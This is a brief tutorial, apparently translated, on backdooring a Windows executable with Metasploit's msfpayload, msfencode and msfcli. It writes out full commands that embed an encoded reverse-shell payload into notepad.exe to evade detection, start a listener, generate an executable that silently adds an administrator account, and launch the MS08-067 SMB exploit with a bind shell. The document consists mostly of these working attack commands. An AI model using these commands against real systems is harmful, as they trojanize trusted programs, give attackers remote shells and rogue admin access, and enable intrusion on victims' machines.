Backdooring an EXE file with the Metasploit Framework
Official website: www.metasploit.com
Mostly taken from https://www.linux520.com/ ; thanks to teacher beach for his selfless contributions
https://www.linux520.com/v/l00047/l00047.html
https://www.irongeek.com/videos/msfpayload-msfencoder-metasploit-3-3.swf
Both of these videos are quite useful.
===================
msfpayload msfencode msfcli
===================
msfpayload -h
Usage: /msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA|[W]ar>
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4455 R | msfencode -k -x notepad.exe -t exe -e x86/shikata_ga_nai -c 5 -o diy_notepad.exe
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=192.168.1.13 lport=4455 E
=====================
msfpayload windows/adduser pass=123123 user=admin x >diy_user_add.exe    # generates the executable file
chmod +x diy_user_add.exe    # adds execute permission to the file (it is generated without execute permission by default)
===============
$ msfcli -h
Usage: /msf3/msfcli <exploit_name> <option=value> [mode]
/msf3/msfcli <exploit_name> <payload_name> t(target) o(option)
========================================================
Mode           Description
----           -----------
(H)elp         You're looking at it baby!
(S)ummary      Show information about this module
(O)ptions      Show available options for this module
(A)dvanced     Show available advanced options for this module
(I)DS Evasion  Show available ids evasion options for this module
(P)ayloads     Show available payloads for this module
(T)argets      Show available targets for this exploit module
(AC)tions      Show available actions for this auxiliary module
(C)heck        Run the check routine of the selected module
(E)xecute      Execute the selected module
msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=1 RHOST=192.168.1.13 LPORT=5555